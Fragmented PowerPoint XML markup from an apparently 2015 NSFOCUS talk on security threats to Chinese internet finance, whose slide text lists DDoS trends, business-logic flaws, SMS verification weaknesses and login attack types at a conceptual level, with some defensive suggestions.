      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1589782" y="143433"/>
          <a:ext cx="6001893" cy="6001893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B642D-F402-426A-860E-7A6ED20615ED}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1658880" y="57221"/>
          <a:ext cx="6001893" cy="6001893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1AFDA-EBAF-4752-94D8-CE63AD2CFE30}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="-5227829" y="-800715"/>
          <a:ext cx="6225360" cy="6225360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BCF92-A2B9-445C-BE8D-D11E1D4DC950}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="436279" y="288903"/>
          <a:ext cx="5692378" cy="578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8927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频率更高</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="436279" y="288903"/>
        <a:ext cx="5692378" cy="578176"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8520B2E3-C03C-460C-8050-9708E766D15C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="74919" y="216631"/>
          <a:ext cx="722720" cy="722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AE343-3CD2-43DA-BD3C-A08CE9249182}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="850583" y="1155889"/>
          <a:ext cx="5278074" cy="578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8927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产业链依然活跃</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="850583" y="1155889"/>
        <a:ext cx="5278074" cy="578176"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13CEC376-D801-4AE9-BFC0-2F576EE7D0F2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="489223" y="1083617"/>
          <a:ext cx="722720" cy="722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565B7-7F26-4D8B-A13B-475B32BBBA16}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="977741" y="2022876"/>
          <a:ext cx="5150916" cy="578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8927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利益驱动明显</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2300" kern="1200" dirty="0" smtClean="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="977741" y="2022876"/>
        <a:ext cx="5150916" cy="578176"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C89F9AE4-2EC7-44BB-BA56-32656C66E8C7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="616381" y="1950604"/>
          <a:ext cx="722720" cy="722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1AFDB-3919-442D-A456-8341E003BBAD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="850583" y="2889863"/>
          <a:ext cx="5278074" cy="578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8927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攻击类型混杂化</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2300" kern="1200" dirty="0" smtClean="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="850583" y="2889863"/>
        <a:ext cx="5278074" cy="578176"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{624F20A6-BB97-4E50-A9FE-F5DEF3EE7D4C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="489223" y="2817591"/>
          <a:ext cx="722720" cy="722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390D3-34B7-4A27-86EC-E7CB4B164511}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="436279" y="3756849"/>
          <a:ext cx="5692378" cy="578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8927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攻击手段更加灵活</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2300" kern="1200" dirty="0" smtClean="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="436279" y="3756849"/>
        <a:ext cx="5692378" cy="578176"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5C46165D-6AEA-4D3C-A721-551BD07B525C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="74919" y="3684577"/>
          <a:ext cx="722720" cy="722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7A559-B9E9-403D-844A-8A0716CA5C9D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="337848"/>
          <a:ext cx="7942215" cy="6244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404" tIns="270764" rIns="61640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网站</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" sz="1300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>-〉</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>网络基础设施（路由器</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" sz="1300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>交换机</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" sz="1300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>/DNS</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>等）</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="337848"/>
        <a:ext cx="7942215" cy="624487"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{294FD11C-BDC0-4C20-9996-499BE31BD2AD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="397110" y="145968"/>
          <a:ext cx="555955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138" tIns="0" rIns="210138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 目标</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="415844" y="164702"/>
        <a:ext cx="5522082" cy="346292"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B5F7A6EA-A687-4585-B4FF-629F21493427}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1224415"/>
          <a:ext cx="7942215" cy="6244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404" tIns="270764" rIns="61640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从几百兆</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" sz="1300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>-〉</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>几十</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>G</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" sz="1300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>-〉</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>几百</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" sz="1300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>G</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>甚至更高</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1224415"/>
        <a:ext cx="7942215" cy="624487"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{21C27FE4-3726-41F2-92B6-3855DD13ED05}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="397110" y="1032535"/>
          <a:ext cx="555955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138" tIns="0" rIns="210138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流量</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="415844" y="1051269"/>
        <a:ext cx="5522082" cy="346292"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DAE9CCA3-EC81-421B-B16B-F0C546F315D3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2110983"/>
          <a:ext cx="7942215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404" tIns="270764" rIns="61640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真实</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" sz="1300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>IP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>地址</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" sz="1300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>-〉IP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>欺骗技术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单一攻击源</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" sz="1300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>-〉</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>多个攻击源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简单协议承载</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" sz="1300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>-〉</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>复杂协议承载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智能化，试图绕过</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" sz="1300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>IDS</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>或</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" sz="1300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>FW</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2110983"/>
        <a:ext cx="7942215" cy="1515150"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8E010E54-9FF2-4770-BFC7-36078B0410D2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="397110" y="1919103"/>
          <a:ext cx="555955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138" tIns="0" rIns="210138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技术</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="415844" y="1937837"/>
        <a:ext cx="5522082" cy="346292"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3725CF3F-D929-412D-92AC-23A70D3BEE25}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3888213"/>
          <a:ext cx="7942215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404" tIns="270764" rIns="61640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300" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>DRDoS</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" sz="1300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>/ACK Flood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300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Zombie Net/BOTNET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300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Proxy Connection Flood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300" kern="1200" smtClean="0"/>
            <a:t>DNS </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" sz="1300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Flood </a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="3888213"/>
        <a:ext cx="7942215" cy="1187550"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3AA1B811-07BF-43A8-8090-2334E3992195}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="397110" y="3696333"/>
          <a:ext cx="555955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138" tIns="0" rIns="210138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smtClean="0"/>
            <a:t>形式</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="415844" y="3715067"/>
        <a:ext cx="552208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B384F-5A5E-463F-B9CB-DCB87F79A453}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>16/1/10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33CFC-A56E-4F50-AB67-B5C75DAA15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179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CC158-A673-4A02-BFF3-6FC4B5979A83}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>16/1/10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CC81A-4912-40B6-A30F-57B53E5A01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6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7529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7650" algn="l" defTabSz="97529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5299" algn="l" defTabSz="97529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62949" algn="l" defTabSz="97529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50598" algn="l" defTabSz="97529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8248" algn="l" defTabSz="97529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25897" algn="l" defTabSz="97529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13547" algn="l" defTabSz="97529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01196" algn="l" defTabSz="97529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攻击动机的变化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986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729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75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此人在报告中宣称：此举不仅仅是为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>IPv4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>做纪念，也显示了一个安全问题：在大家都在热衷于高层次的安全漏洞时，低级别的弱口令等安全问题却依然普遍存在。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8604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/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{39ACC81A-4912-40B6-A30F-57B53E5A0117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597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防护手段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84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6947F-F2A1-47A7-971E-0065438415FB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6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71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21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大量的平台还未开始关注安全漏洞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375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56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自动化利用工具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98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网站能做些什么？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>密码复杂度、强加密、用户提示、每次登录都要验证码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849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假设电脑、手机、资料被盗，能否防止进一步的损失？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911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CC81A-4912-40B6-A30F-57B53E5A0117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38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:\Company\PPT\lib\PPT_2008_封面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753600" cy="7315201"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic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6805626" y="6961740"/>
            <a:ext cx="2846375" cy="26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7530" tIns="48765" rIns="97530" bIns="48765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altLang="zh-CN" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5D6A6D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>© </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5D6A6D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>2015 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5D6A6D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>绿盟科技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90454" y="6872310"/>
            <a:ext cx="4632325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530" tIns="48765" rIns="97530" bIns="48765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150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www.nsfocus.com</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="15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161924" y="3290787"/>
            <a:ext cx="7215206" cy="73183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单击此处插入主标题</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/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101599" y="6961740"/>
            <a:ext cx="2846375" cy="26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7530" tIns="48765" rIns="97530" bIns="48765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1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5D6A6D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>nsfocus.com</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5D6A6D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4305302" y="6372225"/>
            <a:ext cx="1143002" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="C0000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请输入文档密级</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="90454" y="6872310"/>
            <a:ext cx="4632325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530" tIns="48765" rIns="97530" bIns="48765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150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www.nsfocus.com</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="15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 userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="101599" y="6961740"/>
            <a:ext cx="2846375" cy="26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7530" tIns="48765" rIns="97530" bIns="48765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1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5D6A6D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>nsfocus.com</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5D6A6D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61925" y="4157659"/>
            <a:ext cx="7215188" cy="428635"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="2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单击此处插入章节副标题</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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47874" y="0"/>
            <a:ext cx="7643834" cy="65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30" tIns="48765" rIns="97530" bIns="487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47874" y="0"/>
            <a:ext cx="7643834" cy="65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30" tIns="48765" rIns="97530" bIns="487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487363" y="3684588"/>
            <a:ext cx="8778875" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="5D6A6D"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="97530" tIns="48765" rIns="97530" bIns="48765"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US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519082" y="2854324"/>
            <a:ext cx="8715436" cy="73183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accent6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单击此处插入章节标题</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7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3800475"/>
            <a:ext cx="8715375" cy="428629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2400">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl5pPr>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>单击此处插入章节副标题</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/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487363" y="3684588"/>
            <a:ext cx="8778875" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="5D6A6D"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="97530" tIns="48765" rIns="97530" bIns="48765"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US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47874" y="0"/>
            <a:ext cx="7643834" cy="65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30" tIns="48765" rIns="97530" bIns="487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:\Company\PPT\lib\PPT_2008_封底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753599" cy="7315199"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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519082" y="3290787"/>
            <a:ext cx="8786874" cy="73183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单击此处插入封底标题</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0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:\Company\PPT\lib\PPT_2008_内页.jp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1892" y="800080"/>
            <a:ext cx="9429816" cy="635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47874" y="0"/>
            <a:ext cx="7643834" cy="65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30" tIns="48765" rIns="97530" bIns="487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2" r:id="rId4"/>
    <p:sldLayoutId id="2147483675" r:id="rId5"/>
    <p:sldLayoutId id="2147483676" r:id="rId6"/>
  </p:sldLayoutIdLst>
  <p:transition spd="slow">
    <p:cover/>
  </p:transition>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="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nternetcensus2012.bitbucket.org/paper.html" TargetMode="External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buf.com/news/8102.html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jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.jpeg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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all" spc="200" dirty="0" smtClean="0">
                <a:ln w="9000" cmpd="sng">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
              </a:rPr>
              <a:t>乌云笼罩下的互联网金融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78101" y="4305672"/>
            <a:ext cx="7215188" cy="1656184"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>刘进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Alpha_liu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Alpha.liujin@me.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000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336" y="921296"/>
            <a:ext cx="871140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32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为何关于业务设计缺陷漏洞占比较高？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传统漏洞的比重下降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无法贴近业务场景是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>防护设备的短板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业务漏洞涉及商业利益，攻击者感兴趣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获取敏感数据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盗取账号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刷钱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刷积分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诈骗</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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60" y="3183219"/>
            <a:ext cx="47529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834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36640" y="2505472"/>
            <a:ext cx="50405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0" dirty="0" smtClean="0"/>
              <a:t>薅</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="14000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6887667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194133" cy="102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51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短信费是怎样用完的？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328" y="1209328"/>
            <a:ext cx="862086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2332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短信费是怎样用完的？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4100" name="Picture 4" descr="d1160924ab18972b02b33c08e7cd7b899f510a62.jpg (819×429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96" y="1281336"/>
            <a:ext cx="8935538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57" y="1252736"/>
            <a:ext cx="9314151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846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命运多舛的安全功能：短信校验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手机短信：经常带来安全风险的安全功能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短信炸弹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短信钓鱼（短信内容操纵、伪基站）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短信验证码破解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短信验证绕过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短信重复利用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>……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16" y="3369568"/>
            <a:ext cx="4168214" cy="36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14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477" y="800080"/>
            <a:ext cx="4758864" cy="608002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安全功能之重灾区：登录功能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161892" y="800080"/>
            <a:ext cx="4066836" cy="635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账户名猜测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密码破解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利用第三方账号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注册覆盖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任意用户密码重置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短信校验绕过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弱口令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登录流程绕过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批量账号锁定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信息泄露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 smtClean="0"/>
              <a:t>传输劫持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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>钓鱼</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="椭圆 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4814641" y="1929408"/>
            <a:ext cx="241226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47477" y="2649488"/>
            <a:ext cx="241226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9283" y="3346768"/>
            <a:ext cx="241226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323357" y="3330404"/>
